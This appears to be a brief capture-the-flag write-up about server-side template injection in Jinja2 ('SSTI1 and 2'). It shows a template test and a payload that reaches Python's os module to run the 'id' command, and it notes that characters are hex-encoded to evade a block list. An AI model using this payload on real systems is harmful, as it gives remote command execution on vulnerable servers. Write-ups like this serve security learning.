SSTI1 and 2

Posted Apr 16, 2025 Updated May 8, 2025

By Heland

views 1 min read

SSTI1 and 2

As we know it has SSTI vulnerability, we can try this $ and we get the respond $7777777.

Now input our payload:

  
{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

Resource: Jinja2 Cause of blacked list character, we need to change some special characters to hex

Trending Tags